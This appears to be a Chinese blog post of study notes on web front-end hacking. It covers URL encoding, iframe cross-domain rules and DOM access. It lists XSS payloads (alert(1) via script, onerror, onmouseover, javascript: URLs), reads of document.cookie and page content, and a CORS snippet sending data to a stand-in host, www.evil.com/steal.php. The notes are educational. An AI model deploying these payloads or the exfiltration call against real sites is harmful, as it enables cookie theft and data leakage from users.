Web前端黑客技术揭秘 笔记1

参见余弦的博客http://evilcos.me/

一.URL编码方式

      编码escape 解码 unescape

      编码encodeURI 解码decodeURI

      编码encodeURIComponent 解码decodeURIComponent

二.Iframe

       Web安全中出现率最高的,父页与子页如何跨文档读写数据,如果同域,通过调用contentWindow操作子页的DOM树.

       如果不同域,子页可以对父页的location进行写操作,使其重定向其他网页,有写权限,但是没有读权限

三.HTMl内嵌脚本执行

      JavaScript可以出现在HTML的标签的on事件等地方

    

<script>alert(1)</script>
<img src=# οnerrοr="alert(1)" />
<input type="text" value="x" οnmοuseοver="alert(1)" />
<iframe src="javascript:alert(1)"></iframe>
<a href="javascript:alert(1)">x</a>

四.JavaScript DOM 操作

       4.1 获取 HTML 内容隐私

<html>
    <div id="private">

    </div>
</html>
           可以通过
document.getElementById('private').innerHTML

     如果没有指定ID,但是如果div 是DOM树从上到下第三个的话,可以通过

document.getElementsByTagName('div')[2].innerHTML

        4.2 获取Cookies数据

document.cookie

        4.3  获取URL

window.location

        4.4 AJAX 风险

 CORS支持发送数据到另一个域

www.foo.com 的代码如下

function createCORSRequest(method, url) {
    var xhr = new XMLHttpRequest();
    if("withCredentials" in xhr) {
        xhr.open(method, url, true);
    } else if(typeof XDomainRequest != "undefined") {
        xhr = new XDomainRequest();// IE
        xhr.open(method, url);
    } else {
        xhr = null;
    }
    return xhr;
}

var request = createCORSRequest("get", "http://www.evil.com/steal.php?data=456");
if(request) {
    request.onload = function() {
        //对 request.responseText 进行处理
    };
    request.send();
}
steal.php的代码如下

<?php
header("Access-Control-Allow-Origin:http://www.foo.com");
header("Access-Control-Allow-Credentials:true");//允许跨域证书发送
//...
?>

如果Access-Control-Allow-Credentials的值为true,则Access-Control-Allow-Origin的值不能为*



   


评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值